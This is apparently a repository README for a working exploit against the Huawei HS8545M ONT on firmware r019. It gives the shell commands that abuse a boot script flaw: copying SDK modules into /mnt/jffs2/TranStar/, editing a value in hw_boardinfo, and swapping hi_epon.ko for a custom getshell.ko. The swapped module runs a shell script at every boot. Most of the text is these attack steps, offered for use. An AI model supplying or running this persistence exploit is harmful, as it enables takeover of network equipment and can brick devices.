/Exploit-HS8545M-ONT

Exploit Huawei ONT device, only support r019. You need to compile kernel module getshell.ko for r018 or r017 by yourself.

Primary LanguageShell

Note

This maybe brick your ONT device, use at your own risk!

Usage

Find an exploit to load userdefined ko module

find an exploit in /etc/rc.d/rc.start/1.sdk_init.sh, use kernel module .ko to run a shell script /mnt/jffs2/hw/getshell.sh when system reboot.

logical exploit in line 200-206

mkdir -p /mnt/jffs2/TranStar/
cp -rf /lib/modules/hisi_sdk/* /mnt/jffs2/TranStar/

in order to excute line 261-262, change in /mnt/jffs2/hw_boardinfo

obj.id = "0x00000001" ; obj.value = "4";

Upload getshell.ko module, compiled by 0neday, only support r019

cp getshell.ko to /mnt/jffs2/TranStar/hi_epon.ko

License

MIT